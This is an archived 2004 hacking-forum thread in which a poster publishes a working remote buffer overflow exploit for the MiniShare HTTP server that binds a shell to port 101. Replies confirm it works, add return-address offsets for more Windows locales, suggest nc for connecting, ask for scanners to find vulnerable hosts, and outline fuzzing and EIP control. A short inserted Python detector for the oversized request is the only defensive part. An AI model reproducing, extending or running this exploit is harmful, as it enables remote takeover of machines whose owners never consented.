Vendors are now contacted 2 hours before you. Some security sites too. Members, enjoy my discovery,
and check my website again if needed.
CODE
/*
MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1. Binds a shellcode to port 101.
Full disclosure and exploit by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet 07 november 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
------------------ WHAT IS MINISHARE ------------------
Homepage - http://minishare.sourceforge.net/
MiniShare is meant to serve anyone who has the need to share files to anyone, doesn't have a place to store the files on the web, and does not want or simply does not have the skill and possibility to set up and maintain a complete HTTP-server software...
-------------- VULNERABILITY --------------
A simple buffer overflow in the link length, nothing more; read the code for further instructions.
---- FIX ----
Actually none, the vendor is contacted the same day this is published, 1 hour before you. As a nice (filtered) to NGSS, iDEFENSE and all the other private-disclosure homo crew, as well as K-OTiK, who sit around jerking off in their "Lab" lol :->
---- EXTRA ----
Update the JMP ESP if you need. A wrong offset will crash MiniShare. Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English. Other MiniShare versions aren't tested. Tip: if it crashes for you, try to play with Sleep()...
int main(int argc,char *argv[])
{
    ver();
    // argv[1] selects the target, argv[2] the host, optional argv[3] the port
    if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>3)){usage(argv[0]);return -1;}
    if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
    int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c;
    char *target, *os;
    if (argc==4){port=atoi(argv[3]);} else port=80;
    if (atoi(argv[1]) == 1){target=espxp1en;os="WinXP SP1 English";}
    if (atoi(argv[1]) == 2){target=esp2k4en;os="Win2k SP4 English";}
    if (atoi(argv[1]) == 3){target=espnt6en;os="WinNT SP6 English";}
    SOCKET s;
    struct fd_set mask;
    struct timeval timeout;
    struct sockaddr_in server;
    s=socket(AF_INET,SOCK_STREAM,0);
    if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
    cout<<"[+] target: "<<os<<endl;
    server.sin_family=AF_INET;
    server.sin_addr.s_addr=htonl(ip);
    server.sin_port=htons(port);
    WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
    // wait up to 3 seconds for the connect to complete
    timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
    switch(select(s+1,NULL,&mask,NULL,&timeout))
    {
        case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
        case 0:  {cout<<"[+] connection failed."<<endl;closesocket(s);return -1;}
        default:
            if(FD_ISSET(s,&mask))
            {
                cout<<"[+] connected, constructing the payload..."<<endl;
                Sleep(1000);
                sizeA=1787;
                sizeB=414-sizeof(scode);
                sizeC=10;
                sz=sizeA+sizeB+sizeC+sizeof(scode)+17;
                memset(payload,0,sizeof(payload));
                strcat(payload,"GET ");
                for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
                strcat(payload,target);
                for (b=0;b<sizeB;b++){strcat(payload,"\x41");}
                strcat(payload,scode);
                for (c=0;c<sizeC;c++){strcat(payload,"\x41");}
                strcat(payload," HTTP/1.1\r\n\r\n");
                Sleep(1000);
                if (send(s,payload,strlen(payload),0)==SOCKET_ERROR)
                { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
                Sleep(1000);
                cout<<"[+] size of payload: "<<sz<<endl;
                cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
                return 0;
            }
    }
    closesocket(s);
    WSACleanup();
    return 0;
}

void usage(char* us)
{
    cout<<"USAGE: 101_mini.exe Target Ip Port\n"<<endl;
    cout<<"TARGETS: "<<endl;
    cout<<" [+] 1. WinXP SP1 English (*)"<<endl;
    cout<<" [+] 2. Win2k SP4 English (*)"<<endl;
    cout<<" [+] 3. WinNT SP6 English (*)"<<endl;
    cout<<"NOTE: "<<endl;
    cout<<" The port 80 is default if no port specified"<<endl;
    cout<<" The exploit bind a shellcode to the port 101"<<endl;
    cout<<" A wildcard (*) mean Tested."<<endl;
    return;
}

void ver()
{
    cout<<endl;
    cout<<" "<<endl;
    cout<<" ===================================================[v0.1]===="<<endl;
    cout<<" ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1====="<<endl;
    cout<<" =============Remote Buffer Overflow Exploit=================="<<endl;
    cout<<" ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
    cout<<" ============================================================="<<endl;
    cout<<" "<<endl;
}
bye
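As an added defender-side example (not part of class101's post or of MiniShare), here is a check for request lines shaped like the oversized GET the post describes: a request-target far longer than any real path, made mostly of one repeated filler byte, with non-printable bytes inside. The thresholds and the 4-byte placeholder standing in for a return address are assumptions.

```python
# Added example (not from the original post): flags HTTP request lines shaped like
# the oversized GET described above. MAX_TARGET and MAX_RUN are assumed thresholds.
from typing import Dict, Optional, Tuple

MAX_TARGET = 1024      # assumed upper bound for a legitimate request-target length
MAX_RUN = 256          # assumed longest plausible run of one repeated byte in a URI

def parse_request_line(raw: bytes) -> Optional[Tuple[bytes, bytes, bytes]]:
    """Return (method, target, version) from the first line of a raw request, or None."""
    first = raw.partition(b"\r\n")[0]
    parts = first.split(b" ")
    if len(parts) < 3:
        return None
    # join the middle so a 0x20 byte inside a binary target does not hide the rest of it
    return parts[0], b" ".join(parts[1:-1]), parts[-1]

def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte (the padding fingerprint)."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best

def classify_request(raw: bytes) -> Dict[str, object]:
    """Inspect one raw request and report the traits of a MiniShare-style overflow attempt."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return {"malformed": True, "suspicious": True}
    _method, target, _version = parsed
    traits = {
        "malformed": False,
        "target_len": len(target),
        "oversized": len(target) > MAX_TARGET,
        "nonprintable": any(b < 0x20 or b > 0x7E for b in target),
        "filler": longest_run(target) >= MAX_RUN,
    }
    traits["suspicious"] = traits["oversized"] or traits["nonprintable"] or traits["filler"]
    return traits

# Constructed samples, not captured traffic. The second mimics the layout the post describes:
# "GET " + long filler + 4-byte placeholder return address + more filler + " HTTP/1.1".
BENIGN_REQ = b"GET /index.html HTTP/1.1\r\nHost: example\r\n\r\n"
OVERSIZED_REQ = b"GET " + b"A" * 1787 + b"\x01\x02\x03\x04" + b"A" * 424 + b" HTTP/1.1\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQ), ("oversized", OVERSIZED_REQ)):
        print(name, classify_request(req))
```

The same three traits map directly onto an IDS or reverse-proxy rule: a request-target over about a kilobyte that is mostly one byte is not something MiniShare's tiny file listing ever produces.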
Anarchiste
Nov 7 2004, 02:34 PM
I have only one thing to say: hats off to the artist! Honestly, respect for your work, few people contribute as much on the board, and I'm not saying that to kiss your ass, I'm saying it precisely because we lack active people like you... on that note, keep it up, and I promise I won't "recode" this one.
101
Nov 7 2004, 02:39 PM
QUOTE(Anarchiste @ Nov 7 2004, 02:34 PM)
I have only one thing to say: hats off to the artist! Honestly, respect for your work, few people contribute as much on the board, and I'm not saying that to kiss your ass, I'm saying it precisely because we lack active people like you... on that note, keep it up, and I promise I won't "recode" this one.
you can of course recode it, I don't care, but don't say "coded by you" without mentioning the original coder, as the other day, or at least say that you modded it, etc. There's no need to say more than you did.
or at least, if you really want to say "coded by you", erase everything in the code, grab your debugger and code your own.
michael
Nov 7 2004, 02:41 PM
QUOTE
payload send, connect the port 101 to get a shell
how or with what should I connect to port 101? good job on the coding m8
cyrixx
Nov 7 2004, 02:57 PM
tzzzz, try nc, guy
[eXPhase
Nov 7 2004, 03:49 PM
Nice exploit again. Works here on WinXP EN SP1.
Not gonna try this one on other boxes, since the default port is 80 you have to scan for ages before you can test it.
maybe a banner scan will help you
brOmstar
Nov 7 2004, 05:04 PM
thx 101 nice code
here is the jmp esp for xp sp2 german
char espxp2de[]="\x0a\xaf\xd5\x77"; //JMP ESP - user32.dll - WinXP SP2 German
i will add other german offsets soon when i'm back on my workstation...have fun
101
Nov 7 2004, 05:39 PM
QUOTE(brOmstar @ Nov 7 2004, 05:04 PM)
thx 101 nice code
here is the jmp esp for xp sp2 german
char espxp2de[]="\x0a\xaf\xd5\x77"; //JMP ESP - user32.dll - WinXP SP2 German
i will add other german offsets soon when i'm back on my workstation...have fun
thank you, I'll update my code with your help, guys.
mortello
Nov 7 2004, 06:39 PM
Crashes MiniShare on my XP SP1 French....
If you could tell me how to give you the jmp esp.... I would
[eXPhase
Nov 7 2004, 07:01 PM
QUOTE(Killahbee @ Nov 7 2004, 04:58 PM)
QUOTE([eXPhase @ Nov 7 2004, 03:49 PM)
Nice exploit again. Works here on WinXP EN SP1.
Not gonna try this one on other boxes, since the default port is 80 you have to scan for ages before you can test it.
maybe a banner scan will help you
I couldn't find any Shixxnote a few weeks back either, and that was on port 2000. But you get tons of results on 80. And I know the banner, but it is so much work for that single shell I want to see. Nah, I believe 101 that it works on other versions too.
mortello
Nov 7 2004, 07:16 PM
QUOTE([eXPhase @ Nov 7 2004, 07:01 PM)
QUOTE(Killahbee @ Nov 7 2004, 04:58 PM)
QUOTE([eXPhase @ Nov 7 2004, 03:49 PM)
Nice exploit again. Works here on WinXP EN SP1.
Not gonna try this one on other boxes, since the default port is 80 you have to scan for ages before you can test it.
maybe a banner scan will help you
I couldn't find any Shixxnote a few weeks back either, and that was on port 2000. But you get tons of results on 80. And I know the banner, but it is so much work for that single shell I want to see. Nah, I believe 101 that it works on other versions too.
------------------------------------------------------------------------------- 127.0.0.1 Responds with ICMP unreachable: No TCP ports: 80
TCP 80: [HTTP/1.1 200 OK Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>]
thx go to DiabloHorn 4 posting the great tool called findjump
101
Nov 8 2004, 10:06 PM
so if someone knows the method to get the universal jmp, if there is one, thx to tell me how to find it. thanx
brOmstar
Nov 8 2004, 10:17 PM
what exactly is a universal jmp call... does it mean that this jmp esp is the same on every system, in the same dll @ the same address??
101
Nov 8 2004, 10:29 PM
yes bromstar, a universal jmp address will work on every windows, as in many previous exploits; take the rpc1 for example, when HDMoore rlsed it, you can search on packetstormsecurity for my modded exploit, I added a lot of offsets but about 1 week later it was useless because the universal offset was found.
I haven't got papers on how to find this, I don't care if there is a magic offset to find for minishare but anyway I'd like to learn this method, if some1 knows something about this or has a good paper about it, thanx to post it.
brOmstar
Nov 8 2004, 10:41 PM
I know universal opcodes, but not if it is of the kind I described (cause then a tool must check every osversion/lang/sp to detect that.. I think - should be impossible). I read something about msfpescan at metasploit.org.
taken from http://www.metasploit.org/confs/blackhat2004/defcon.pdf
--------------------------------------------------------
Msfpescan - Return Address Fun
Scans PE images for data (DLL, EXE)
Finds universal return addresses
Easy to script, easy to parse output
Regular expression match support
Can automatically disassemble code
msfpescan found good returns
DCOM - NT SP6 -> XP SP1
Serv-U - All versions NT->2K3
LSASS - Autodetect Universal
Blackice - Mad Bruteforce Foo
-----------------------------------------------------------
so that should be a way to detect universal offsets.
3.1 Utilities The new utilities are really just the icing on the cake, and their importance is only fully evident once the tools are utilized.
Msfpescan can be used to analyze and disassemble executables and DLLs, which helps to find the correct offsets and addresses during the stage of exploitation and privilege escalation. It can search for jmp statements or for a sequence like pop-pop-ret, and the utility even supports regular expressions. This can be used to find effective return addresses from Windows expressions, and thus can be used to add new targets to the exploit.
The various command line flags are as shown below:
Usage: /home/framework-2.2/msfpescan <input> <mode> <options>
Inputs:
    -f <file>      Read in PE file
    -d <dir>       Process memdump output
Modes:
    -j <reg>       Search for jump equivalent instructions
    -s             Search for pop+pop+ret combinations
    -x <regex>     Search for regex match
    -a <address>   Show code at specified virtual address
Options:
    -A <count>     Number of bytes to show after match
    -B <count>     Number of bytes to show before match
    -I address     Specify an alternate ImageBase
    -n             Print disassembly of matched data
but I don't understand how to find the universal offset with that tool (at the moment).
Could it be that the jmp is in a dll that is loaded and shipped with the exploited software and is the same for every os/lang/ver??
101
Nov 8 2004, 11:05 PM
thanx man, I will read this.
Deadhat
Nov 9 2004, 11:40 AM
where do i get findjump?
ConfigSys
Nov 9 2004, 12:33 PM
tested & worked on WinXP SP1 (English) Professional. good work 101
simple hint: because the exploit works with port 80, it means we can explore the victim IP and then see if we've got a MiniShare server.
ZoraX
Nov 9 2004, 01:28 PM
nice sploit :D Just tested locally and worked 100%, keep the good work up :)
alzeimeur
Nov 9 2004, 01:53 PM
nice Xploit, tested locally, works perfectly, but I have a question: is there a scanner for this Xploit?
thx al'
101
Nov 9 2004, 03:36 PM
thanx all for the nice answers, I found another hole in a small ftp server, check my website, I'm rlsing it soon, time to advise its coder atm
l8r
GamezDoG
Nov 9 2004, 04:11 PM
Is there some scanner for this exploit?? Because there are a lot of port 80s??
paskaluis
Nov 9 2004, 07:36 PM
101, thx for the code, what prog do I need to use for debugging (jump addy) to add different offsets?
da_cash
Nov 9 2004, 08:43 PM
for all people interested, here's the tool used for finding offsets in your versions..
ps.. class101, could you create a tutorial about win buffer overflows / how you find them and what tools you use... it may help us gain some more knowledge
101
Nov 9 2004, 10:47 PM
I debug a small app and simply send various strings to it, and boom!
I don't use code to find them. just using many times...
mortello
Nov 10 2004, 02:36 AM
QUOTE(101 @ Nov 9 2004, 10:47 PM)
I debug a small app and simply send various strings to it, and boom!
I don't use code to find them. just using many times...
care to explain how you "debug" an ftp server/web server or else... maybe that could help us (members here) to find some bugs also....
brOmstar
Nov 10 2004, 10:10 AM
run it in a debugger and simply send arguments...
agathos
Nov 11 2004, 03:04 PM
yeah, a good debugger is WinDBG, running like gdb under linux, or OllyDBG or softice
ShouiZen
Nov 11 2004, 07:29 PM
char espxp2fr[]="\x0A\xAF\xD5\x77"; //0x77D5AF0A - user32.dll jmp esp WIN XP SP2 french
It works fine (I tested). 101, would you do a tutorial for all governmentsecurity members? thanks
DHS`
Nov 11 2004, 09:56 PM
idd @ only port 80, & banner doesn't help
DiabloPatch
Nov 12 2004, 01:23 AM
well, nice those exploits, but it would also be nice to tell them how you learn such things. Knowledge should be for everyone.
So just a very tiny quick intro to this (since there are numerous posts on this board covering this subject).
Finding exploits is also referred to as fuzzing, which means sending random-length strings to a port where a service runs to see if it crashes or something odd happens. This is the easy definition to find the normal overflows. There are more powerful fuzzing techniques to find other kinds of exploits.
After finding an "exploit" at this stage, rather called a bug, you fire up your debugger (softice or ollydbg) and start to mess around with it. The easiest explanation would be: try to get "control of eip", meaning that you know exactly how many bytes to send before you start overwriting the value of eip.
At the stage where you control eip, all you need to do is find out where your "payload" is and how to get there. So just find an opcode to overwrite eip with so that eip points to your "payload".
Then you have manually created a working exploit. After some testing etc you can just make a little C/perl program to do it all automatically.
This was a very short explanation of how it's done in a very basic way. For more references here are some papers.
well, nice those exploits, but it would also be nice to tell them how you learn such things. Knowledge should be for everyone.
DiabloHorn, there is no need to explain what is already perfectly explained in tons of public papers.... I think until now I've spread enough clear code to be understood.... The guys telling me to write something are just too lazy themselves to start learning C, asm and exploit coding. What I'm not doing like the papers is the fuzzing technique, which I do manually as I already said, because I'm sure to find more holes that way than by using a tool to detect them.
that's all.
bye